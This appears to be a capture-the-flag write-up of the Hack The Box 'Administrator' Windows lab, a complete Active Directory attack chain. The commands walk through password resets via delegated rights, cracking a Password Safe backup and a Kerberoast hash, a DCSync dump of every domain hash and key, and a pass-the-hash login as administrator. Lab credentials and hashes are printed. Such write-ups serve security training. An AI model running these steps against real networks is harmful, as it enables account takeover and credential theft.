HTB-Administrator

Box Info

Difficulty	Medium
OS	Windows
IP Address	10.10.11.42

Credentials

As is common in real life Windows pentests, you will start the Administrator box with credentials for the following account:

Olivia : ichliebedich

Port Scanning

# Check all open TCP
sudo rustscan 10.10.11.42 -r 1-65535 --ulimit 5000
# Nmap scan with script on open TCP port
sudo nmap 10.10.11.42 -sCV -Pn -sT -p 21,53,88,135,139,389,445,464,593,636,5985,9389,47001,49470,49665,49664,49666,49667,49668,64855,64860,64867,64880,64912
# Nmap scan vulnerability 
sudo nmap -sT -p 21,53,88,135,139,389,445,464,593,636,5985,9389,47001,49470,49665,49664,49666,49667,49668,64855,64860,64867,64880,64912 --script=vuln -O -Pn 10.10.11.42
# Nmap scan with UDP port
sudo nmap -sU --top-ports 20 -Pn 10.10.11.42

PORT      STATE SERVICE       VERSION
21/tcp    open  ftp           Microsoft ftpd
| ftp-syst: 
|_  SYST: Windows_NT
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-03-19 21:17:07Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49470/tcp open  msrpc         Microsoft Windows RPC
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
64855/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
64860/tcp open  msrpc         Microsoft Windows RPC
64867/tcp open  msrpc         Microsoft Windows RPC
64880/tcp open  msrpc         Microsoft Windows RPC
64912/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Update DNS

sudo nano /etc/hosts
10.10.11.42 administrator.htb 

Service Enumeration

389/tcp - LDAP

Since Machine had provide the information of the user credentials, lets try with the bloodhound to collect information.

bloodhound-python -u 'olivia' -p 'ichliebedich' -d administrator.htb -ns 10.10.11.42 -c all
sudo neo4j start
bloodhound

Upon checking the AD info, found some interesting user. Olivia user Outbound Object Control - First Degree Object Control

Outbound Object Control - Transitive Object Control show more info

Olivia user has the GenericAll permission to Michael user.
Michael user able to ForceChangePassword to Benjamin user.

Upon checking “Find all the Edges that any UNPRIVILEGED user (based on the admincount:False) has against all the nodes” which exposed Emily user has the GenericWrite permission to Ethan

For the First Degree Object Control of Ethan shows that he had the DCSync to DC

OLIVIA to BENJAMIN

Lets abuse the GenericAll to obtained Michael user using BloodyAD

python3.13 -m venv venv
source venv/bin/activate

sudo ntpdate -s 10.10.11.42
bloodyAD --host "10.10.11.42" -d "Administrator.htb" -u "olivia" -p "ichliebedich" set password "Michael" "ichliebedich"

Now, we can proceed to Benjamin user from Michael using same method by abusing ForceChangePassword

bloodyAD --host "10.10.11.42" -d "Administrator.htb" -u "Michael" -p "ichliebedich" set password "Benjamin" "ichliebedich"

21/tcp - FTP

Upon understanding of the Share Moderators, it is the FTP service groups. Here I will use the benjamin credentials to access

ftp benjamin@10.10.11.42
Password: ichliebedich

Inside FTP folder, there is a Backup.psafe3 file, Lets download and check how we can work on it.

ftp> binary
ftp> passive
ftp> get Backup.psafe3

Crack the psafe3 master with John

Upon OSINT, found ‘Different programs may use files with the PSAFE3 file extension for different purposes, so unless you are sure which format your PSAFE3 file is, you may need to try a few different programs.’

https://pwsafe.org/quickstart.shtml

https://file.org/extension/psafe3

So I used the passwordsafe to open

sudo apt-get install passwordsafe
pwsafe

It seems to have the Master password inside in this Password Safe Database file.

We can follow reference link to crack the password

pwsafe2john Backup.psafe3 > crack.txt
sudo john --wordlist=/usr/share/wordlists/rockyou.txt crack.txt

Open psafe3 file with Password Safe

Backup.psafe3:tekieromucho

alexander:UrkIbagoxMyUGw0aPlj9B0AXSea4Sw
emily:UXLCI5iETUsIBoFVTj8yQFKoHjXmb
emma:WwANQWnmJnGV07WQN8bMS7FMAbjNur

Initiate User Foothold

Validate user password

nxc winrm 10.10.11.42 -u user.txt -p pass.txt -d administrator.htb --continue-on-success

emily user is valid for WinRM access.

Capture the User Flag

evil-winrm -i administrator.htb -u emily -p UXLCI5iETUsIBoFVTj8yQFKoHjXmb

Privilege Escalation

From the bloodhound, we know that Emily user had the GenericWrite permission to the Ethan user. Here we can try the Targeted Kerberoast tools to obtian a crackable hash

sudo ntpdate 10.10.11.42
python3 targetedKerberoast.py -v -d 'administrator.htb' -u 'emily' -p 'UXLCI5iETUsIBoFVTj8yQFKoHjXmb'

Crack Ethan hash

Lets try hashcat to crack the Ethan user password

hashcat -m 13100 --force ethan.hash /usr/share/wordlists/rockyou.txt

limpbizkit   

Session..........: hashcat
Status...........: Cracked

Now we obtained Ethan user credentials and able to abuse DCSync rights to obtain Administrator NT Hash

impacket-secretsdump -just-dc-user administrator administrator.htb/ethan:"limpbizkit"@10.10.11.42

Administrator:500:aad3b435b51404eeaad3b435b51404ee:3dc553ce4b9fd20bd016e098d2d2fd2e:::

Initiate Root Foothold

evil-winrm -i administrator.htb -u administrator -H 3dc553ce4b9fd20bd016e098d2d2fd2e

Hashes

python3.13 /home/kali/Desktop/AD/Impacket/examples/secretsdump.py "Administrator.htb/ethan:limpbizkit"@"dc.administrator.htb"
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:3dc553ce4b9fd20bd016e098d2d2fd2e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:1181ba47d45fa2c76385a82409cbfaf6:::
administrator.htb\olivia:1108:aad3b435b51404eeaad3b435b51404ee:fbaa3e2294376dc0f5aeb6b41ffa52b7:::
administrator.htb\michael:1109:aad3b435b51404eeaad3b435b51404ee:fbaa3e2294376dc0f5aeb6b41ffa52b7:::
administrator.htb\benjamin:1110:aad3b435b51404eeaad3b435b51404ee:fbaa3e2294376dc0f5aeb6b41ffa52b7:::
administrator.htb\emily:1112:aad3b435b51404eeaad3b435b51404ee:eb200a2583a88ace2983ee5caa520f31:::
administrator.htb\ethan:1113:aad3b435b51404eeaad3b435b51404ee:5c2b9f97e0620c3d307de85a93179884:::
administrator.htb\alexander:3601:aad3b435b51404eeaad3b435b51404ee:cdc9e5f3b0631aa3600e0bfec00a0199:::
administrator.htb\emma:3602:aad3b435b51404eeaad3b435b51404ee:11ecd72c969a57c34c819b41b54455c9:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:cf411ddad4807b5b4a275d31caa1d4b3:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:9d453509ca9b7bec02ea8c2161d2d340fd94bf30cc7e52cb94853a04e9e69664
Administrator:aes128-cts-hmac-sha1-96:08b0633a8dd5f1d6cbea29014caea5a2
Administrator:des-cbc-md5:403286f7cdf18385
krbtgt:aes256-cts-hmac-sha1-96:920ce354811a517c703a217ddca0175411d4a3c0880c359b2fdc1a494fb13648
krbtgt:aes128-cts-hmac-sha1-96:aadb89e07c87bcaf9c540940fab4af94
krbtgt:des-cbc-md5:2c0bc7d0250dbfc7
administrator.htb\olivia:aes256-cts-hmac-sha1-96:713f215fa5cc408ee5ba000e178f9d8ac220d68d294b077cb03aecc5f4c4e4f3
administrator.htb\olivia:aes128-cts-hmac-sha1-96:3d15ec169119d785a0ca2997f5d2aa48
administrator.htb\olivia:des-cbc-md5:bc2a4a7929c198e9
administrator.htb\michael:aes256-cts-hmac-sha1-96:409e1ae3a9e1d8531a7d9d2d83d0aa02f0d6c5a5435c621e3304b294fe32d4e9
administrator.htb\michael:aes128-cts-hmac-sha1-96:97cbb32467f5971a85b6beb994d12fdb
administrator.htb\michael:des-cbc-md5:e6851cb51f078ae3
administrator.htb\benjamin:aes256-cts-hmac-sha1-96:85c174190270b6f36bd1318ea26a22c603901a57c78f3316c96f2a334b28107f
administrator.htb\benjamin:aes128-cts-hmac-sha1-96:df0b408d253e548c4ec180a082e3a593
administrator.htb\benjamin:des-cbc-md5:f7013ec492139dc4
administrator.htb\emily:aes256-cts-hmac-sha1-96:53063129cd0e59d79b83025fbb4cf89b975a961f996c26cdedc8c6991e92b7c4
administrator.htb\emily:aes128-cts-hmac-sha1-96:fb2a594e5ff3a289fac7a27bbb328218
administrator.htb\emily:des-cbc-md5:804343fb6e0dbc51
administrator.htb\ethan:aes256-cts-hmac-sha1-96:e8577755add681a799a8f9fbcddecc4c3a3296329512bdae2454b6641bd3270f
administrator.htb\ethan:aes128-cts-hmac-sha1-96:e67d5744a884d8b137040d9ec3c6b49f
administrator.htb\ethan:des-cbc-md5:58387aef9d6754fb
administrator.htb\alexander:aes256-cts-hmac-sha1-96:b78d0aa466f36903311913f9caa7ef9cff55a2d9f450325b2fb390fbebdb50b6
administrator.htb\alexander:aes128-cts-hmac-sha1-96:ac291386e48626f32ecfb87871cdeade
administrator.htb\alexander:des-cbc-md5:49ba9dcb6d07d0bf
administrator.htb\emma:aes256-cts-hmac-sha1-96:951a211a757b8ea8f566e5f3a7b42122727d014cb13777c7784a7d605a89ff82
administrator.htb\emma:aes128-cts-hmac-sha1-96:aa24ed627234fb9c520240ceef84cd5e
administrator.htb\emma:des-cbc-md5:3249fba89813ef5d
DC$:aes256-cts-hmac-sha1-96:98ef91c128122134296e67e713b233697cd313ae864b1f26ac1b8bc4ec1b4ccb
DC$:aes128-cts-hmac-sha1-96:7068a4761df2f6c760ad9018c8bd206d
DC$:des-cbc-md5:f483547c4325492a
[*] Cleaning up...